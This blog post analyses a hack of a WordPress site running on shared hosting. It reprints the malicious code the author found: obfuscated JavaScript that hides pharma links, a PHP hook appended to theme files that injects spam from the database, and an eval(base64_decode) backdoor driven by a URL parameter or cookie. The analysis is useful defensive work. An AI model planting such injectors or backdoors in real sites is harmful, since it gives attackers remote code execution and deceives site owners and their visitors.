Graham King

Solvitas perambulum

WordPress Black Hat SEO dissected

software blackhat
Summary
A friend noticed hidden pharma links on her GoDaddy-hosted WordPress site, which led to the discovery of a sophisticated black hat SEO hack. The CSS to hide the links was injected via obfuscated JavaScript, disguising the activity from browsers and users. This code, embedded in the `functions.php` of each theme, pulled encoded data from the WordPress database and injected it into the site's HTML. Additional PHP files allowed attackers to execute base64-encoded commands through URL parameters or cookies. The source of the attack remains unclear, but moving to a private server resolved it. The hack aimed to boost SEO rankings for pharma sites, showing the lengths some will go for search engine optimization.

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy hosted WordPress site, and that led me into the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:

pharma-links

From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere on the page. It’s being written out by this obfuscated Javascript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies – maybe it’s random or maybe a version number. You can find many other victims by searching for 13018518….

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is the PHP has been edited. The functions.php in every single theme had this appended to the bottom (scroll all the way to the right for the important part):

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
if (!defined('wp_m1')) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
        return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') is reading from the database, reversing the value, and injecting it into the page. The name of the option changes, presumably it’s picked from a list at infection time. There’s a nice touch here where it doesn’t show to logged in users, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).

In the wp_options database table that _iconfeed1 contains the Javascript and HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some wordpress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.

Back end – input

But wait, it’s about to get so much better, because the next question is how the hell did they write to wp_options. An svn diff of the wordpress install against the repo reveals these new files:

  • wp-content/<theme>/entry-nav.php # In several, but not all, themes
  • wp-content/<theme>/sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those file? Oh, you’re in for a treat – here’s the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variables names clearly taken from a word list. Most of them didn’t seem to run, they were missing variable and a closing php tag. For analysis, here’s a full one (minus php tag) that did run, and that I’ve hacked around to display it’s output: obfuscated php (To understand it look for ‘hello’).

It decodes to this:

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["b02005f9ffdf8"])
    ? $i["b02005f9ffdf8"]:
(isset($i["HTTP_B02005F9FFDF8"])?$i["HTTP_B02005F9FFDF8"]:die
);
eval(base64_decode($a));)

That takes base64 encoded PHP code in either a URL parameter or a cookie, and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too. It changes for each infection, so other people will have a hard time taking advantage of the back door.

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw==

Who did it? How?

Who did it? In the apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because it has a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute force cracking attempts, but POSTing to the login page gets you about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own wordpress multi-site on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated Javascript, which was written into the database by base 64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Back Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about his, please let me know in the comments, and I’ll update the post. Thanks!